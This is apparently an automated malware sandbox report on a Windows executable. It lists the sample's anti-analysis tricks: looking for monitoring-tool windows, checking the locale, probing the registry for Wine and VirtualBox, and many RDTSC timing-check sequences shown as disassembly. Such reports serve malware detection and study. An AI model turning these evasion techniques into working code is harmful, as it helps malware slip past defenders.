                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00659860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00659860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13592
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1B6E3 second address: A1B6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1DD94 second address: A1DD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1DD99 second address: A1DD9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1DD9E second address: A1DDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1DDA4 second address: A1DDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA3D4C68E67h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1DEB1 second address: A1DEB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1DEB5 second address: A1DEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1DEC3 second address: A1DEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA3D4D82106h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3D4D82112h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1DEE2 second address: A1DEF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1DEF1 second address: A1DF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jno 00007FA3D4D82121h 0x00000010 pop eax 0x00000011 jp 00007FA3D4D82109h 0x00000017 movzx edi, cx 0x0000001a lea ebx, dword ptr [ebp+1244FBBCh] 0x00000020 jmp 00007FA3D4D8210Eh 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jbe 00007FA3D4D8210Ch 0x0000002e jc 00007FA3D4D82106h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1E17D second address: A1E181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3EA92 second address: A3EAAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3CBB2 second address: A3CBD1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4C68E5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3D4C68E5Ah 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D02B second address: A3D031 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D154 second address: A3D162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007FA3D4C68E56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D162 second address: A3D16F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007FA3D4D82106h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D16F second address: A3D196 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3D4C68E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA3D4C68E65h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D196 second address: A3D19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D435 second address: A3D445 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3D4C68E62h 0x00000008 jo 00007FA3D4C68E56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D6F0 second address: A3D6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D83A second address: A3D84F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b jl 00007FA3D4C68E5Eh 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3DB55 second address: A3DB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3DB5E second address: A3DB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3DB64 second address: A3DB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3DB68 second address: A3DB81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3DB81 second address: A3DB8E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FA3D4D82106h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3DB8E second address: A3DB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A35EF6 second address: A35F04 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA3D4D82106h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A0B16A second address: A0B170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A0B170 second address: A0B17A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A0B17A second address: A0B1A7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007FA3D4C68E56h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jns 00007FA3D4C68E58h 0x00000015 jo 00007FA3D4C68E5Eh 0x0000001b jng 00007FA3D4C68E56h 0x00000021 push edx 0x00000022 pop edx 0x00000023 jl 00007FA3D4C68E5Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E214 second address: A3E21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E21A second address: A3E227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E4C2 second address: A3E4D2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E4D2 second address: A3E4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4C68E61h 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E4E8 second address: A3E504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D82118h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E8D1 second address: A3E8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E8D5 second address: A3E8F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3D4D82116h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A45807 second address: A45811 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA3D4C68E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A100AD second address: A100B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A49DBE second address: A49DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A49F03 second address: A49F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3D4D82115h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4A368 second address: A4A36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4A4FE second address: A4A502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4B64F second address: A4B653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4B773 second address: A4B77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA3D4D82106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4B96E second address: A4B972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4BB61 second address: A4BB67 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4BB67 second address: A4BB6C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4BB6C second address: A4BB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4BFD8 second address: A4BFDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4BFDE second address: A4BFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4BFE2 second address: A4BFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4C166 second address: A4C16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4DB49 second address: A4DB5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FA3D4C68E5Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4E1CC second address: A4E1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4E1D0 second address: A4E1D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4EBAD second address: A4EBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, 0BC96DC4h 0x00000010 push 00000000h 0x00000012 mov edi, esi 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D2CDBh] 0x0000001c push eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4FB37 second address: A4FBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA3D4C68E58h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e xor di, E347h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FA3D4C68E58h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D3913h], edi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FA3D4C68E58h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov esi, dword ptr [ebp+122D2858h] 0x00000057 push eax 0x00000058 jbe 00007FA3D4C68E7Ch 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FA3D4C68E5Fh 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A50666 second address: A506B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c clc 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FA3D4D82108h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b jmp 00007FA3D4D8210Ah 0x00000030 push eax 0x00000031 pushad 0x00000032 pushad 0x00000033 jnc 00007FA3D4D82106h 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A506B6 second address: A506BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5685C second address: A56871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3D4D8210Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A150EB second address: A15117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E68h 0x00000008 jnc 00007FA3D4C68E56h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A52529 second address: A52541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A53B5A second address: A53B5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A15117 second address: A1511B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A52541 second address: A5254B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA3D4C68E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1511B second address: A15123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5A4BF second address: A5A4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5BAA4 second address: A5BABB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3D4D82108h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FA3D4D82106h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5BABB second address: A5BAC5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5AC34 second address: A5AC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5AC3A second address: A5AC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5C95E second address: A5C963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5C963 second address: A5C9FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FA3D4C68E58h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+124631BCh] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007FA3D4C68E58h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D222Eh], ebx 0x0000004e call 00007FA3D4C68E61h 0x00000053 and edi, dword ptr [ebp+122D3226h] 0x00000059 pop ebx 0x0000005a push 00000000h 0x0000005c adc di, B700h 0x00000061 xchg eax, esi 0x00000062 pushad 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5BCB0 second address: A5BCB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5C9FA second address: A5CA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5BCB4 second address: A5BCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5CA00 second address: A5CA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FA3D4C68E58h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5BCBD second address: A5BCC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5D882 second address: A5D887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5DA53 second address: A5DA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
